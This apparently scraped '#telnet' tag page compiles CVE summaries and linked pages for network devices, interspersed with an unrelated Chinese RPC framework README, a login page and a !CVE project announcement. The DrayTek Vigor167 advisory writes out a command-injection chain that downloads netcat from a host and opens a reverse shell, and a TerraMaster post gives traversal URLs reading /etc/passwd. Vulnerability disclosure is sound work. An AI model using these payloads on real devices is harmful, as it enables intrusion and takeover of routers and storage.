A Huawei data communication product has a command injection vulnerability. Successful exploitation of this vulnerability may allow attackers to gain higher privileges.

CVE-2022-48616: Huawei NetEngine AR617VW Authenticated Root RaCE

An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

CVE-2023-47254

Tenda W30E V16.01.0.12(4843) was discovered to contain a Command Execution vulnerability via the function /goform/telnet.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-49406: TENDA/w30e/tenda_w30e_telnet/w30e_telnet.md at main · GD008/TENDA

An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.

CVE-2023-24046: Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE

A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request.

**Jupiter:**

*   Jupiter 是一款性能非常不错的, 轻量级的分布式服务框架

**Jupiter Architecture:**

           ═ ═ ═▷ init         ─ ─ ─ ▷ async       ──────▶ sync
    ----------------------------------------------------------------------------------------
    
                                ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
                                           ┌ ─ ─ ─ ┐ │
               ─ ─ ─ ─ ─ ─ ─ ─ ─│ Registry  Monitor ───────────────────────────┐
              │                            └ ─ ─ ─ ┘ │                         │
                                └ ─ ─△─ ─ ─ ─ ─△─ ─ ─                          ▼
              │                                                           ┌ ─ ─ ─ ─
            Notify                   ║         ║                            Telnet │
              │         ═ ═ ═ ═ ═ ═ ═           ═ ═ ═ ═ ═ ═ ═ ═ ═         └ ─ ─ ─ ─
                       ║                                         ║             ▲
              │    Subscribe                                  Register         │
                       ║                                         ║             │
              │  ┌ ─ ─ ─ ─ ─                          ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─    │
                            │─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ▷           ┌ ─ ─ ─ ┐ │   │
              └ ▷│ Consumer           Invoke          │ Provider  Monitor ─────┘
                            │────────────────────────▶           └ ─ ─ ─ ┘ │
                 └ ─ ─ ─ ─ ─                          └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
    
    ---------------------------------------------------------------------------------------
    

**RELEASE-NOTES****性能:**

*   小数据包请求(不带业务)在四核刀片服务器上可达到17w+的tps, 详情见 Benchmark
*   参考: 多个 RPC 框架的 Benchmark 见这里

**文档:**

*   High performance RPC with netty
*   High performance RPC with netty.pdf
*   Wiki
*   其他文档
*   发展路线

**一次 RPC 调用:**

感谢 @远墨 提供的图

**快速开始:****工程依赖:**

*   JDK1.8 或更高版本
*   依赖管理工具: Maven3.x 版本

**最新版本OSS下载****最新版本Maven中心仓库下载****Maven依赖:**

<dependency\>
    <groupId\>org.jupiter-rpc</groupId\>
    <artifactId\>jupiter-all</artifactId\>
    <version\>${jupiter.version}</version\>
</dependency\>

**简单调用示例:****1\. 创建服务接口:**

@ServiceProvider(group = "test", name = "serviceTest")
public interface ServiceTest {
    String sayHelloString();
}

@ServiceProvider:
    - 建议每个服务接口通过此注解来指定服务信息, 如不希望业务代码对jupiter依赖也可以不使用此注解而手动去设置服务信息
        + group: 服务组别(选填, 默认组别为'Jupiter')
        + name: 服务名称(选填, 默认名称为接口全限定名称)

**2\. 创建服务实现:**

@ServiceProviderImpl(version = "1.0.0")
public class ServiceTestImpl implements ServiceTest {

    @Override
    public String sayHelloString() {
        return "Hello jupiter";
    }
}

@ServiceProviderImpl:
    - 建议每个服务实现通过此注解来指定服务版本信息, 如不希望业务代码对jupiter依赖也可以不使用此注解而手动去设置版本信息
        + version: 服务版本号(选填, 默认版本号为'1.0.0')

**3\. 启动注册中心:****\- 选择1: 使用 jupiter 默认的注册中心:**

public class HelloJupiterRegistryServer {

    public static void main(String\[\] args) {
        // 注册中心
        RegistryServer registryServer = RegistryServer.Default.createRegistryServer(20001, 1);
        try {
            registryServer.startRegistryServer();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}

**\- 选择2: 使用 zookeeper 作为注册中心:**

默认注册中心只建议在测试环境使用, 线上建议使用 zookeeper 实现

// 设置使用 zookeeper 作为注册中心
JServer server = new DefaultServer(RegistryService.RegistryType.ZOOKEEPER)
JClient client = new DefaultClient(RegistryService.RegistryType.ZOOKEEPER)

在 server 和 client 中配置 jupiter-registry-zookeeper 依赖(jupiter-all 包含 jupiter-registry-zookeeper)

<dependency\>
    <groupId\>org.jupiter-rpc</groupId\>
    <artifactId\>jupiter-registry-zookeeper</artifactId\>
    <version\>${jupiter.version}</version\>
</dependency\>

**4\. 启动服务提供(Server):**

public class HelloJupiterServer {

    public static void main(String\[\] args) throws Exception {
        JServer server = new DefaultServer().withAcceptor(new JNettyTcpAcceptor(18090));
        // provider
        ServiceTestImpl service = new ServiceTestImpl();
        // 本地注册
        ServiceWrapper provider = server.serviceRegistry()
                .provider(service)
                .register();
        // 连接注册中心
        server.connectToRegistryServer("127.0.0.1:20001");
        // 向注册中心发布服务
        server.publish(provider);
        // 启动server
        server.start();
    }
}

**5\. 启动服务消费者(Client)**

public class HelloJupiterClient {

    public static void main(String\[\] args) {
        JClient client = new DefaultClient().withConnector(new JNettyTcpConnector());
        // 连接RegistryServer
        client.connectToRegistryServer("127.0.0.1:20001");
        // 自动管理可用连接
        JConnector.ConnectionWatcher watcher = client.watchConnections(ServiceTest.class);
        // 等待连接可用
        if (!watcher.waitForAvailable(3000)) {
            throw new ConnectFailedException();
        }

        ServiceTest service = ProxyFactory.factory(ServiceTest.class)
                .version("1.0.0")
                .client(client)
                .newProxyInstance();

        service.sayHelloString();
    }
}

Server/Client 代码示例

**新特性**

v1.3 新增 InvokeType.AUTO, 当你的接口返回值是一个 CompletableFuture 或者它的子类将自动适配为异步调用, 否则为同步调用 具体 demo 请参考这里

**结合Spring使用示例:****1\. Server端配置:**

<jupiter:server id\="jupiterServer" registryType\="default"\> 
    <jupiter:property registryServerAddresses\="127.0.0.1:20001" />
</jupiter:server\>


<bean id\="serviceTest" class\="org.jupiter.example.ServiceTestImpl" />

<jupiter:provider id\="serviceTestProvider" server\="jupiterServer" providerImpl\="serviceTest"\>
    <jupiter:property weight\="100"/>
</jupiter:provider\>

**2\. Client 端配置:**

<jupiter:client id\="jupiterClient" registryType\="default"\> 
    <jupiter:property registryServerAddresses\="127.0.0.1:20001" />
</jupiter:client\>


<jupiter:consumer id\="serviceTest" client\="jupiterClient" interfaceClass\="org.jupiter.example.ServiceTest"\>
    <jupiter:property version\="1.0.0.daily" />
    <jupiter:property serializerType\="proto\_stuff" />
    <jupiter:property loadBalancerType\="round\_robin" />
    <jupiter:property timeoutMillis\="3000" />
    <jupiter:property clusterStrategy\="fail\_over" />
    <jupiter:property failoverRetries\="2" />
    <jupiter:methodSpecials\>
        
        <jupiter:methodSpecial methodName\="sayHello" timeoutMillis\="5000" clusterStrategy\="fail\_fast" />
    </jupiter:methodSpecials\>
</jupiter:consumer\>

SpringServer/SpringClient 代码示例

**更多示例代码****其他**

*   qq交流群: 397633380
*   邮件交流: jiachun\_fjc@163.com

CVE-2023-48887: GitHub - fengjiachun/Jupiter: Jupiter是一款性能非常不错的, 轻量级的分布式服务框架

Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.

**TerraMaster\_S1.0\_V2.295存在任意文件下载漏洞**

**漏洞详情**  
TERRA MASTER F2-NAS2中的系统版本≤TerraMaster\_S1.0\_V2.295时存在任意文件下载漏洞。通过该漏洞，可以读取存在于系统上的任意文件，希望厂商及时修复。  
**漏洞复现**  
http://\[\]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fpasswd  
http://\[\]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fserviceconf.xml  
文件内容：  
<root>  
<GLOBAL\_PARAM LeafId="0">  
  
<sName>monitor</sName>  
</GLOBAL\_PARAM>  
<SERVER\_PARAM LeafId="1">  
<sSWITCH>on</sSWITCH>  
  
<sSERName>/usr/sbin/utelnetd</sSERName>  
<sSERVERSTARTPARM>-p 23</sSERVERSTARTPARM>  
  
<iOPERATIONTYPE>3</iOPERATIONTYPE>  
  
<iINTERVALTIME>30</iINTERVALTIME>  
  
<sREBOOTTIME>00:00</sREBOOTTIME>  
</SERVER\_PARAM>  
</root>  
注意，即使将文件特别设置为644(guest禁止存取)但是仍然可以被guest下载。  
**修复方案**  
1\. download.php在下载文件时加上鉴权逻辑。  
2\. 防止目录穿越，以mnt目录作为起始点。

CVE-2023-48185: TerraMaster_S1.0_V2.295存在任意文件下载漏洞 - 国民专业级NAS --铁威马官方论坛

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

Recently, Mikrotik added a REST server as a new API for managing the router. It is a nice alternative to their proprietary API when automating RouterOS.

However, young software usually contains bugs. Sometimes, these bugs are security-related, and, together with not-so-safe defaults, they may create a vulnerability.

This vulnerability has been assigned the ID CVE-2023-41570.

**Background**

RouterOS (from Mikrotik) is a closed-source Linux-based operating system for network appliances, specifically switches, routers and firewalls. It is used in Mikrotik appliances (such as RouterBOARD), but it can be downloaded and installed on other devices and virtual machines.

The management interfaces of RouterOS include SSH, MAC-Telnet, Winbox (a proprietary Windows-only tool), Webfig (a web user interface), and a proprietary API (additionally, ISPs have also TR-069). Since version v7.1beta4, RouterOS also includes a REST server. The REST server is started as a sub-resource of Webfig at /rest. More information on the RouterOS REST API web page.

**Authentication**

RouterOS supports local and remote user authentication and authorization databases (via RADIUS). Users belong to _groups_, each with its own permissions set. The resulting permission set is additive – it is the sum of all permissions granted by groups.

By default, only the local database is used, and three groups are present: full, with unlimited access to the router; write, with almost complete access except for file transfer (to/from the router itself) and user policies, and read, with read-only access (plus reboot privileges). Also, by default, rest-api is a specific permission granted to all groups.

Users may be restricted to logging in only from specific IP addresses or networks.

**The vulnerability**

REST APIs are protected by HTTP Basic authentication. You should provide a valid username and password pair. The username must have the rest-api (which, by default, is granted to all groups).

The vulnerability lies in the fact that, while other interfaces (SSH, Webfig, etc.) check whether the user is authorized to log in from that specific IP address, this is not the case for the REST server. **Users can access the REST server from any IP address**, even if they are not authorized in the users’ database.

To exploit this vulnerability:

*   the attacker must have a username and password pair that has rest-api permission (but no permission to log in from the attacker IP address);
*   the firewall should allow access to the web user interface from the IP address of the attacker;
*   Webfig (the web UI) must be enabled: the REST server is part of Webfig.

Note that, by default, all groups have the rest-api permission (any user is allowed to use REST APIs), and Webfig is enabled. There is no way to disable the REST server, as it is integrated into Webfig. This is unexpected; usually, services like SSH or proprietary APIs are under the “IP” -> “Services” menu with their independent entry. At the very least, there should be a flag in the Webfig service www to enable the REST server selectively (defaulting off).

So, I think the majority of those who left Webfig active don’t realize that they are exposing the REST endpoint too, and that every user can access it, regardless of the IP filter configured in the user database.

To exacerbate the problem, the read group has some dangerous permissions: sniff (to intercept traffic), reboot, and sensitive (read sensitive information, such as Wi-Fi passwords or IPSec pre-shared keys). I certainly do not expect a “read” user to reboot the router.

**Mikrotik advisory and solution**

Mikrotik released RouterOS version 7.12 with the fix (the changelog contains only a generic reference to “www - fixed allowed address setting for REST API users”).

**Timeline**

I followed the responsible disclosure process described in the “Responsible disclosure of discovered vulnerabilities” page. I reported the vulnerability at 2023-08-19 09:46:00 UTC and received the ACK at 2023-08-24 07:43:00 UTC. The fix was released in version 7.12 at 2023-11-09 09:45:00 UTC (time point from RouterOS changelog).

CVE-2023-41570: CVE-2023-41570: Access Control vulnerability in MikroTik REST API

Netflix, Spotify, Twitter, PayPal, Slack. All down for millions of people. How a group of teen friends plunged into an underworld of cybercrime and broke the internet—then went to work for the FBI.

The Mirai Confessions: Three Young Hackers Who Built a Web-Killing Monster Finally Tell Their Story

The !CVE Project is an initiative to track and identify security issues that are not acknowledged by vendors but still are important for the security community.

=======  
Mission  
=======

The mission of !CVE (read not CVE) is to track, identify and provide a  
common space for !vulnerabilities that are not acknowledged by vendors but  
still are serious security issues.

This project was presented a few days ago at Black Hat Toronto 2023 [1]  
and will also be presented next week at DeepSec 2023 [2].

===  
Why  
===

According to MITRE's CNA rules section 7.1:

       "CNAs are left to their own discretion to determine whether  
        something is a vulnerability."[3]

This poses a clear conflict of interest, since the same vendor is the one  
deciding whether or not an issue is a vulnerability and therefore whether a  
CVE is assigned to their own product or not.

==============  
What is a !CVE  
==============

    - A common place for !vulnerabilities (read not vulnerabilities)

    - Security issues not covered by the traditional CVE.

    - An identifier following common naming starting with an exclamation  
      mark(!) Example: !CVE-2023-0001

============================  
How to request a new !CVE ID  
============================

The !CVE Project is alive and assigning !CVE-IDs for security issues that  
present an advantage for an attacker.

You can request a !CVE ID at: https://notcve.org/form.php

======================  
How !CVEs are assigned  
======================

A panel will review !CVE requests and if qualifies, a new !CVE number will  
be assigned and details will be publicly available.

==============================  
How to access to !CVEs details  
==============================

Using the search engine at https://notcve.org or a direct link to the !CVE  
entry. For example, the first ever !CVE is available at:  
https://notcve.org/view.php?id=!CVE-2023-0001

The search engine combines information from multiple sources and also  
searches for regular CVEs in all fields from all sources. For example to  
search by credit we can obtain CVE discovered by Google Project Zero:

https://notcve.org/search.php?query=Google+Project+Zero

=========================  
What qualifies for a !CVE  
=========================

Examples that qualifies for a !CVE:  
-----------------------------------  
    - A security issues that is not acknowledged by the vendor as a  
      vulnerability.

    - A security issue acknowledged by a vendor as technically correct  
      but outside their threat model.

    - A notified security issue that has not been assigned a CVE after  
      90 days.

    - A published security issue without an assigned CVE.

Examples that do NOT qualify for a !CVE:  
----------------------------------------  
    - A software defect with no impact on security.

    - A generic security issue, you need to list one or more  
      devices/software affected with your finding.

    - Well known attacks to unencrypted channels to obtain  
      credentials: Telnet, FTP, etc.

    - You can read the FAQ [4] for more examples.

In short, we see the !CVE Project as a great initiative to track and  
identify security issues that are not acknowledged by vendors but still are  
important for the security community.

==========  
References  
==========

[1]   
https://www.blackhat.com/sector/2023/arsenal/schedule/index.html#cve-a-new-platform-for-unacknowledged-cybersecurity-vulnerabilities-36144

[2] https://www.deepsec.net/speaker.html#PSLOT667

[3] https://cve.mitre.org/cve/cna/CNA_Rules_v3.0.pdf

[4] https://notcve.org/faq.html

---  
!CVE Team

[ A PGP key is available for encrypted communications at  
https://notcve.org/contact.html ]

Not CVE Announcement

An Access Control issue discovered in Extreme Networks Switch Engine (EXOS) before 32.5.1.5, also fixed in 22.7, 31.7.2 allows attackers to gain escalated privileges using crafted telnet commands via Redis server.

  
  
Please review the Extreme Portal Help article if you have questions or issues logging in.  

Effective October 3, 2023 our URL has changed from 'extremeportal.force.com' to 'extreme-networks.my.site.com'.  
Please update all bookmarks.

Email

Password

Remember me

Reset Password / Forgot Password

Create a new Extreme Portal account

Extreme Networks, Inc. employee?Log In

© Extreme Networks, Inc. All rights reserved.

Tag

#telnet